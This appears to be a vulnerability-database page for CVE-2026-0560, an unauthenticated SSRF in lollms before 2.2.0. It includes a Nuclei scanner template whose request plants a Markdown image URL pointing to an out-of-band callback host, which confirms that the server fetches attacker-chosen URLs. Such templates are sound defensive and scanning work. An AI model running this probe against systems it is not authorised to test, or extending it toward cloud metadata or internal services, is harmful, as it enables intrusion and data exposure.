/Vulnerability Library

LolLMS < 2.2.0 - Server-Side Request Forgery

CVE-2026-0560
Verified

Description

A Server-Side Request Forgery (SSRF) vulnerability exists in parisneo/lollms versions prior to 2.2.0. The /api/files/export-content endpoint processes Markdown image URLs by downloading them via _download_image_to_temp() in backend/routers/files.py without any validation, allowing an unauthenticated attacker to supply arbitrary URLs (e.g. cloud metadata endpoints or internal services) that the server will fetch, enabling internal network access, cloud metadata access, information disclosure, port scanning, and potentially remote code execution.

Severity

High

CVSS Score

7.5

Exploit Probability

2%

Affected Product

lollms

Published Date

April 21, 2026

Template Author

ritikchaddha

CVE-2026-0560.yaml
id: CVE-2026-0560

info:
  name: LolLMS < 2.2.0 - Server-Side Request Forgery
  author: ritikchaddha
  severity: high
  description: |
    A Server-Side Request Forgery (SSRF) vulnerability exists in parisneo/lollms versions prior to 2.2.0. The /api/files/export-content endpoint processes Markdown image URLs by downloading them via _download_image_to_temp() in backend/routers/files.py without any validation, allowing an unauthenticated attacker to supply arbitrary URLs (e.g. cloud metadata endpoints or internal services) that the server will fetch, enabling internal network access, cloud metadata access, information disclosure, port scanning, and potentially remote code execution.
  impact: |
    Attackers can access internal network services, cloud metadata, and potentially execute remote code.
  remediation: |
    Update to version 2.2.0 or later.
  reference:
    - https://huntr.com/bounties/65e43a5e-b902-4369-b738-1825285a3ea5
    - https://nvd.nist.gov/vuln/detail/CVE-2026-0560
    - https://github.com/parisneo/lollms/commit/76a54f0df2df8a5b254aa627d487b5dc939a0263
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2026-0560
    epss-score: 0.02051
    epss-percentile: 0.8399
    cwe-id: CWE-918
  metadata:
    verified: false
    max-request: 1
    vendor: parisneo
    product: lollms
    shodan-query: http.title:"lollms"
  tags: cve,cve2026,ssrf,lollms,oast

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - "LolLMS"
        internal: true
        case-insensitive: false

  - raw:
      - |
        POST /api/files/export-content HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"markdown_text":"# SSRF Test\n\n![ssrf](http://{{interactsh-url}}/ssrf-probe)\n","output_format":"docx"}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: status
        status:
          - 200
# digest: 4a0a004730450221009ebcc507c2422b8a7c67e7bfaee355207b02ced29abb5f7b7bc9ba047d543652022075af1a5e4adfa8c8d04f5cb5692dd3e243b933a9e3fa20d7d8faf9b56b872e9f:922c64590222798bb761d5b6d8e72950
7.5Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE ID:
cve-2026-0560
CWE ID:
cwe-918

References

https://huntr.com/bounties/65e43a5e-b902-4369-b738-1825285a3ea5https://nvd.nist.gov/vuln/detail/CVE-2026-0560https://github.com/parisneo/lollms/commit/76a54f0df2df8a5b254aa627d487b5dc939a0263

Remediation Steps

Update to version 2.2.0 or later.